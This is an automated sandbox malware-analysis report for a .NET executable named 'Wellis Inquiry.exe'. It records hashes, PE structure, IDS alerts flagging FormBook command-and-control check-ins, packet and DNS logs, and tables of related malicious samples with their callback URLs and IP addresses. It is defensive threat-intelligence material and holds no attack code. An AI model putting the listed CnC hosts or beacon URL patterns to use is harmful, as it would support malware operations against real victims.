34.102.136.180 | psychedeliccosmetics.com | United States | 15169 | GOOGLEUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | true
104.21.2.218 | www.ebookgratis.online | United States | 13335 | CLOUDFLARENETUS | true

                                                          General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502627
Start date: 14.10.2021
Start time: 07:27:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Wellis Inquiry.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@9/6
EGA Information: Failed
HDC Information:
• Successful, ratio: 14.3% (good quality ratio 13.1%)
• Quality average: 73.4%
• Quality standard deviation: 30.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.50.102.62, 95.100.218.79, 104.94.89.6, 51.11.168.232, 20.54.110.249, 40.112.88.60, 2.20.178.33, 2.20.178.24, 20.82.210.154
• Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, settings-win.data.microsoft.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, settingsfd-geo.trafficmanager.net, e11290.dspg.akamaiedge.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtAllocateVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

Time | Type | Description
07:28:29 | API Interceptor | 1x Sleep call for process: Wellis Inquiry.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

Match: 199.59.242.153

Associated Sample Name | Detection | Context
010013.exe | malicious | www.lifestyleeve.com/o4ms/?X61HiLc=8GNZfXhxkQPDp/0Q3wwiQDJ4fZPKroBOtzHsTvHuSmq05FSo/HrWX19J684oFY+7hHWk&jHPhl=5jo4ZxbHw
XaTgTJhfol.exe | malicious | www.gafoodstamps.com/mexq/?v2JP=aujtepI6qRwt4NWlDzxdhSPeB9mp7HwM3P6GccjuQrHNTxqttOPLCNBNcH4bMoCm5uRW&GZ_=4h-TkZ9hp8gh-
6pa7yRpcFt.exe | malicious | www.myverizonbillpay.com/hr8n/?f0DDp6RH=ILCQys4W2nmI16PHUn3vKB7/UprAS8tji7H+tefUzZaDXaBN/QiF2o4GX0UFNMprHqhN&8pNLu=7nGt2pBPBx
Emask230921doc.exe | malicious | www.newyroklifeannuities.com/x9r4/?7n0=R48xY&c2Jp7Bc0=lcZHIyAd6OHv52M4P4oACjlfZtfJGnVbGUlMndCBdmn5tcdEwHSZ2MqsoIPmB/a4+IEQ
Invoice Packing list.exe | malicious | www.vspfotme.com/eods/?6liXpZH=EJMYTlsbPcKMchoi/NCYrSOUkQ1lcyycXKbirIJaFNH/FpU7Xng2HIBKTdIWJb6tzkCK&EBPLR=cVnDMB4H0pL
D8043D746DC108AC0966B502B68DDEABA575E841EDFA2.exe | malicious | ww1.survey-smiles.com/
Productivity.exe | malicious | ww1.thefreesmsapp.com/_tr
Productivity.exe | malicious | ww1.thefreesmsapp.com/_tr
kIWGxQYKYO.exe | malicious | www.burgettflorist.com/scb0/?3fS4=GgI5Mtow8RWwVkMKBQaBMThn8Kn2le3rEGwIGwauHSmKVNxcFOKD/koJDpRpHIi9Dc2a2cTcbQ==&s4UxHb=VdWhLdXhd8SL8l
PO 1,5001993 21118.exe | malicious | www.shose8.com/ergs/?3fH8bR=WRNiM0MNR83AvUgJMfCXzTGXaLsU3JZqni9ehjpnFXkT45BJtbNl1RpkrODexH0A0JoG&nX=xFQHHbDxAfpTC
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | malicious | ww1.survey-smiles.com/
RFQ_Beijing Chengruisi Manufacturing_pdf.exe | malicious | www.anodynemedicalmassage.com/euzn/?G0Ddo=u178RPbEoFHNEMSTYSAKyFLEc68kuAf3hAv/2v3T+vkoQ4nsSSLkzGkhPsJYzpfotw78F7bWTQ==&2dod=HL3Tzluhwhvxcp
SQLPLUS.EXE | malicious | ww1.weirden.com/
TNT 07833955.exe | malicious | www.tenncreative.com/b5ce/?C2M=Rg3TsdfntIiWJKNWRmLTqgm5mB7Gwns4ujDsoW9GSorZA7LMeCjIS06nAIZUc2zUa+VgrpSNrw==&2dtd=2dTpyPZX3Tqt_8d0
LogJhhPPyK.exe | malicious | www.mammutphilippines.com/n90q/?-ZYT=GiWrvS/99XrV+2Uf6Zy/o5YW6c6VukN0OHlBSCCHHBiFQpS9xb5cjKCaQXfJL9Q9t00b&IZsH=3fjpWpD0JdD
PO.exe | malicious | www.rejddit.com/ig04/?0DH8qx3=3h/Tr838qcHUz18OOMqR99bs8cT2OrpSq2e3FqStS3xcK7WNKLX9gCPVSXRmyxeIco6krjPjWg==&jL3=-ZrdqHw
D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe | malicious | ww4.onlygoodman.com/
pay.exe | malicious | www.salartfinance.com/t75f/?V6yLxzHh=lAZRvM4hLFtTWseMMjmTcl+RZcUPNrURFXAml9hw9i0ZHFoSyWAXJ/sXcd8B+Vv3Doaf&bX=AdotnVi0RxtDfRqP
DOC.exe | malicious | www.camham.co.uk/imm8/?oZBd28E8=JSfa42tBaq4a3YeMfphPE2TCUHWdSJf7Yy7nyCnDPKehtAvkSRQbSxaf+1hgIsLr6SVj&7n6hj=p2MtFfu8w4Y
RFQ.Order 0128-44.exe | malicious | www.glatt.store/5afm/?0FQ0vvt=JMGrtXIs8RtMHth06d94tZTj42tDCsOeVWPwlq/2m+LWjBoF9Wmh8X/iRtktzTq0TwDw&nP=PtUdq8l

                                                          Domains

Match: parkingpage.namecheap.com

Associated Sample Name | Detection | Context
REQUIREMENT.exe | malicious | 198.54.117.210
ORD2021100866752371AC.exe | malicious | 198.54.117.217
Scan_34668000.exe | malicious | 198.54.117.217
Angebot Anfrage Maschinensucher YOM.exe | malicious | 198.54.117.218
vk5MXd2Rxm.msi | malicious | 198.54.117.217
orde443123.exe | malicious | 198.54.117.216
DHL Shipment Notification 74683783.exe | malicious | 198.54.117.210
vbc.exe | malicious | 198.54.117.218
KYTransactionServer.exe | malicious | 198.54.117.215
doc_0862413890.exe | malicious | 198.54.117.218
PO08485.xlsx | malicious | 198.54.117.212
vURlUPQLT0.exe | malicious | 198.54.117.211
n0jr7NLyU1.exe | malicious | 198.54.117.218
EFghz5ZtCS.exe | malicious | 198.54.117.218
1cG7fOkPjS.exe | malicious | 198.54.117.216
SOA 2021.exe | malicious | 198.54.117.215
etiyrfIKft.exe | malicious | 198.54.117.217
115-209.doc | malicious | 198.54.117.210
s0JV4f4mDk.exe | malicious | 198.54.117.210
obizx.exe | malicious | 198.54.117.212

Match: shops.myshopify.com

Associated Sample Name | Detection | Context
divpCHa0h7.exe | malicious | 23.227.38.74
pago atrasado.exe | malicious | 23.227.38.74
xHSUX1VjKN.exe | malicious | 23.227.38.74
dtMT5xGa54.exe | malicious | 23.227.38.74
New Order For Chile.xlsx | malicious | 23.227.38.74
TransportLabel_1189160070.xlsx | malicious | 23.227.38.74
REQ2021102862448032073.exe | malicious | 23.227.38.74
XaTgTJhfol.exe | malicious | 23.227.38.74
vk5MXd2Rxm.msi | malicious | 23.227.38.74
pKD3j672HL.exe | malicious | 23.227.38.74
2KW3KamMqq.exe | malicious | 23.227.38.74
HP8voO5Ikv.exe | malicious | 23.227.38.74
DHLAWB 191021.xlsx | malicious | 23.227.38.74
KYTransactionServer.exe | malicious | 23.227.38.74
103 Ref 2853801324189923.exe | malicious | 23.227.38.74
doc_0862413890.exe | malicious | 23.227.38.74
1cG7fOkPjS.exe | malicious | 23.227.38.74
549TXoJm6p.exe | malicious | 23.227.38.74
famz10.doc | malicious | 23.227.38.74
5Zebq6UNKC.exe | malicious | 23.227.38.74

                                                          ASN

Match: SAKURA-CSAKURAInternetIncJP

Associated Sample Name | Detection | Context
IYn5yyW2Fx | malicious | 160.27.18.218
Ah46Wx4m5W | malicious | 49.212.179.77
1cG7fOkPjS.exe | malicious | 183.181.96.79
etiyrfIKft.exe | malicious | 183.181.96.120
MV ROCKET_PDA.exe | malicious | 183.181.96.79
Lv9eznkydx.exe | malicious | 120.136.10.95
ATT32481.html | malicious | 210.188.201.169
UwwOF5CGBp.exe | malicious | 183.181.96.16
cu8KB5if2T | malicious | 157.112.148.25
kEZpozRREF | malicious | 160.27.203.237
CDcUegnLSd | malicious | 160.27.203.212
00340434296886123692.exe | malicious | 183.181.96.71
MDM 467574385758 SKTPCC AFRICAGM64635664.exe | malicious | 183.181.96.46
sora.x86 | malicious | 182.49.57.28
jKira.arm7 | malicious | 133.167.92.111
dark.x86 | malicious | 112.78.226.191
sprogr.exe | malicious | 210.188.201.66
77dsREO8Me.exe | malicious | 183.181.96.122
Hua Joo Success Industry.xlsx | malicious | 183.181.96.122
ATT93774.HTM | malicious | 219.94.203.180

Match: BODIS-NJUS

Associated Sample Name | Detection | Context
010013.exe | malicious | 199.59.242.153
XaTgTJhfol.exe | malicious | 199.59.242.153
6pa7yRpcFt.exe | malicious | 199.59.242.153
drolnux.exe | malicious | 199.59.242.153
Emask230921doc.exe | malicious | 199.59.242.153
Invoice Packing list.exe | malicious | 199.59.242.153
D8043D746DC108AC0966B502B68DDEABA575E841EDFA2.exe | malicious | 199.59.242.153
Productivity.exe | malicious | 199.59.242.153
Productivity.exe | malicious | 199.59.242.153
kIWGxQYKYO.exe | malicious | 199.59.242.153
PO 1,5001993 21118.exe | malicious | 199.59.242.153
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe | malicious | 199.59.242.153
RFQ_Beijing Chengruisi Manufacturing_pdf.exe | malicious | 199.59.242.153
SQLPLUS.EXE | malicious | 199.59.242.153
TNT 07833955.exe | malicious | 199.59.242.153
LogJhhPPyK.exe | malicious | 199.59.242.153
PO.exe | malicious | 199.59.242.153
D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe | malicious | 199.59.242.153
pay.exe | malicious | 199.59.242.153
DOC.exe | malicious | 199.59.242.153

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wellis Inquiry.exe.log
Process: C:\Users\user\Desktop\Wellis Inquiry.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: false
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.925371225202555
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Win16/32 Executable Delphi generic (2074/23) 0.01%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Wellis Inquiry.exe
File size: 337408
MD5: c357a8010e661a49df2e813bd22590b6
SHA1: 08ecd005e1449ec97d0405e83649686ae35f6286
SHA256: eef137583da6deb4a1be9882cede6cec5112b74ae79c0773f45b13346c5b2890
SHA512: 71957a0cd597213808b15b1abe9ce3df07889627b4a1b849362df07de6da3984803c6b2e6487338375a558dc9c1f0db32aee42fde89cee305078c22d6b92890e
SSDEEP: 6144:YaX+sbCdgMkhBJDxtvArlcq90N9prggZmNqoPjLfsPbU9wgJlhjb3BB5NAwg6oBm:Y/pd7SBBArlMN9FsrPXETWwa53BB5NAk
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga..............0..............:... ...@....@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x453ab2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x616787BC [Thu Oct 14 01:28:28 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (this line is repeated 97 times in the listing: the zero bytes, 00 00, that follow the six-byte jmp stub decode to this instruction)

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x53a60          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x54000          0x5d4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x56000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x51ab8       0x51c00   False     0.952127532492   data       7.93897204497   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x54000          0x5d4         0x600     False     0.4296875        data       4.15892523316   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x56000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA      Size   Type                                                                          Language  Country
RT_VERSION   0x54090  0x344  data
RT_MANIFEST  0x543e4  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2015 - 2021
Assembly Version  1.0.0.0
InternalName      MutexAccessRu.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       Win UsbInit
ProductVersion    1.0.0.0
FileDescription   Win UsbInit
OriginalFilename  MutexAccessRu.exe

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
10/14/21-07:29:45.850339  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49808        80         192.168.2.4     183.90.240.3
10/14/21-07:29:45.850339  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49808        80         192.168.2.4     183.90.240.3
10/14/21-07:29:45.850339  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49808        80         192.168.2.4     183.90.240.3
10/14/21-07:29:51.188764  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49814        80         192.168.2.4     34.102.136.180
10/14/21-07:29:51.188764  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49814        80         192.168.2.4     34.102.136.180
10/14/21-07:29:51.188764  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49814        80         192.168.2.4     34.102.136.180
10/14/21-07:29:51.303333  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49814      34.102.136.180  192.168.2.4
10/14/21-07:29:56.615066  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49818        80         192.168.2.4     151.106.117.36
10/14/21-07:29:56.615066  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49818        80         192.168.2.4     151.106.117.36
10/14/21-07:29:56.615066  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49818        80         192.168.2.4     151.106.117.36
10/14/21-07:29:57.113888  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49818      151.106.117.36  192.168.2.4
10/14/21-07:30:17.527386  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49842        80         192.168.2.4     199.59.242.153
10/14/21-07:30:17.527386  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49842        80         192.168.2.4     199.59.242.153
10/14/21-07:30:17.527386  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49842        80         192.168.2.4     199.59.242.153
10/14/21-07:30:28.557863  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49847      23.227.38.74    192.168.2.4

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Oct 14, 2021 07:29:45.562988997 CEST  49808        80         192.168.2.4     183.90.240.3
Oct 14, 2021 07:29:45.846936941 CEST  80           49808      183.90.240.3    192.168.2.4
Oct 14, 2021 07:29:45.850227118 CEST  49808        80         192.168.2.4     183.90.240.3
Oct 14, 2021 07:29:45.850338936 CEST  49808        80         192.168.2.4     183.90.240.3
Oct 14, 2021 07:29:46.134744883 CEST  80           49808      183.90.240.3    192.168.2.4
Oct 14, 2021 07:29:46.135214090 CEST  80           49808      183.90.240.3    192.168.2.4
Oct 14, 2021 07:29:46.135237932 CEST  80           49808      183.90.240.3    192.168.2.4
Oct 14, 2021 07:29:46.135498047 CEST  49808        80         192.168.2.4     183.90.240.3
Oct 14, 2021 07:29:46.135566950 CEST  49808        80         192.168.2.4     183.90.240.3
Oct 14, 2021 07:29:46.421039104 CEST  80           49808      183.90.240.3    192.168.2.4
Oct 14, 2021 07:29:51.170027971 CEST  49814        80         192.168.2.4     34.102.136.180
Oct 14, 2021 07:29:51.187925100 CEST  80           49814      34.102.136.180  192.168.2.4
Oct 14, 2021 07:29:51.188422918 CEST  49814        80         192.168.2.4     34.102.136.180
Oct 14, 2021 07:29:51.188764095 CEST  49814        80         192.168.2.4     34.102.136.180
Oct 14, 2021 07:29:51.206609011 CEST  80           49814      34.102.136.180  192.168.2.4
Oct 14, 2021 07:29:51.303333044 CEST  80           49814      34.102.136.180  192.168.2.4
Oct 14, 2021 07:29:51.303390026 CEST  80           49814      34.102.136.180  192.168.2.4
Oct 14, 2021 07:29:51.303857088 CEST  49814        80         192.168.2.4     34.102.136.180
Oct 14, 2021 07:29:51.303914070 CEST  49814        80         192.168.2.4     34.102.136.180
Oct 14, 2021 07:29:51.617247105 CEST  49814        80         192.168.2.4     34.102.136.180
Oct 14, 2021 07:29:51.635545015 CEST  80           49814      34.102.136.180  192.168.2.4
Oct 14, 2021 07:29:56.355865955 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:56.609545946 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:56.609750986 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:56.615066051 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:56.867995977 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.113888025 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.113965988 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114002943 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114037037 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114070892 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:57.114078999 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114100933 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:57.114115953 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114142895 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114168882 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114192963 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114217997 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114242077 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:57.114244938 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:29:57.114272118 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:57.114362955 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:57.114530087 CEST  49818        80         192.168.2.4     151.106.117.36
Oct 14, 2021 07:29:57.368109941 CEST  80           49818      151.106.117.36  192.168.2.4
Oct 14, 2021 07:30:12.273660898 CEST  49841        80         192.168.2.4     104.21.2.218
Oct 14, 2021 07:30:12.289676905 CEST  80           49841      104.21.2.218    192.168.2.4
Oct 14, 2021 07:30:12.290152073 CEST  49841        80         192.168.2.4     104.21.2.218
Oct 14, 2021 07:30:12.290184021 CEST  49841        80         192.168.2.4     104.21.2.218
Oct 14, 2021 07:30:12.306087971 CEST  80           49841      104.21.2.218    192.168.2.4
Oct 14, 2021 07:30:12.313358068 CEST  80           49841      104.21.2.218    192.168.2.4
Oct 14, 2021 07:30:12.313596010 CEST  80           49841      104.21.2.218    192.168.2.4
Oct 14, 2021 07:30:12.313697100 CEST  49841        80         192.168.2.4     104.21.2.218
Oct 14, 2021 07:30:12.313725948 CEST  49841        80         192.168.2.4     104.21.2.218
Oct 14, 2021 07:30:12.330281019 CEST  80           49841      104.21.2.218    192.168.2.4
Oct 14, 2021 07:30:17.426793098 CEST  49842        80         192.168.2.4     199.59.242.153
Oct 14, 2021 07:30:17.526969910 CEST  80           49842      199.59.242.153  192.168.2.4
Oct 14, 2021 07:30:17.527101040 CEST  49842        80         192.168.2.4     199.59.242.153
Oct 14, 2021 07:30:17.527385950 CEST  49842        80         192.168.2.4     199.59.242.153
Oct 14, 2021 07:30:17.627717972 CEST  80           49842      199.59.242.153  192.168.2.4
Oct 14, 2021 07:30:17.628267050 CEST  80           49842      199.59.242.153  192.168.2.4
Oct 14, 2021 07:30:17.628300905 CEST  80           49842      199.59.242.153  192.168.2.4
Oct 14, 2021 07:30:17.628323078 CEST  80           49842      199.59.242.153  192.168.2.4
Oct 14, 2021 07:30:17.628499985 CEST  49842        80         192.168.2.4     199.59.242.153
Oct 14, 2021 07:30:17.628571987 CEST  49842        80         192.168.2.4     199.59.242.153
Oct 14, 2021 07:30:28.493421078 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.509732962 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.510006905 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.510090113 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.525974035 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.557862997 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.557920933 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.557960033 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.557998896 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.558028936 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.558054924 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.558067083 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.558100939 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.558126926 CEST  80           49847      23.227.38.74    192.168.2.4
Oct 14, 2021 07:30:28.558146954 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.558171988 CEST  49847        80         192.168.2.4     23.227.38.74
Oct 14, 2021 07:30:28.576592922 CEST  49847        80         192.168.2.4     23.227.38.74

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Oct 14, 2021 07:29:45.284503937 CEST  56794        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:29:45.550026894 CEST  53           56794      8.8.8.8      192.168.2.4
Oct 14, 2021 07:29:51.145488024 CEST  56627        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:29:51.167728901 CEST  53           56627      8.8.8.8      192.168.2.4
Oct 14, 2021 07:29:56.321822882 CEST  56621        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:29:56.353691101 CEST  53           56621      8.8.8.8      192.168.2.4
Oct 14, 2021 07:30:07.181576967 CEST  63116        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:30:07.220613956 CEST  53           63116      8.8.8.8      192.168.2.4
Oct 14, 2021 07:30:12.243588924 CEST  64078        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:30:12.267743111 CEST  53           64078      8.8.8.8      192.168.2.4
Oct 14, 2021 07:30:17.323776960 CEST  64801        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:30:17.425107002 CEST  53           64801      8.8.8.8      192.168.2.4
Oct 14, 2021 07:30:22.664800882 CEST  51255        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:30:22.688800097 CEST  53           51255      8.8.8.8      192.168.2.4
Oct 14, 2021 07:30:28.433368921 CEST  52337        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:30:28.462132931 CEST  53           52337      8.8.8.8      192.168.2.4
Oct 14, 2021 07:30:33.582624912 CEST  55046        53         192.168.2.4  8.8.8.8
Oct 14, 2021 07:30:33.607409954 CEST  53           55046      8.8.8.8      192.168.2.4

DNS Queries

Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class
Oct 14, 2021 07:29:45.284503937 CEST  192.168.2.4  8.8.8.8  0x5aeb    Standard query (0)  www.marunouchi1.com           A (IP address)  IN (0x0001)
